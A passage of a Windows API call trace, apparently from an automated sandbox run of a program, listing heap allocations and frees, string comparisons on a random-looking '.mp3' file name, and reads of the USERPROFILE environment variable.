hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0206.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0206.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0206.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2a69bb0 [0206.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JlLewkGtdwovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lLewkGtdwovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LewkGtdwovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ewkGtdwovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wkGtdwovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kGtdwovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtdwovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tdwovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dwovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ovoI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="voI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oI.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0206.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73648 [0206.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73648 | out: hHeap=0x2af0000) returned 1 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0206.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0206.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0206.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0206.064] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0206.064] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0206.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0206.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0206.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0206.064] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0206.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.065] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75000 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0206.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0206.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0206.066] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0206.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.066] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74d28 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0206.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0206.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0206.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0206.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0206.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0206.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0206.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0206.069] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0206.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0206.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0206.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0206.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0206.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0206.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0206.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0206.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0206.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0206.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0206.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0206.071] 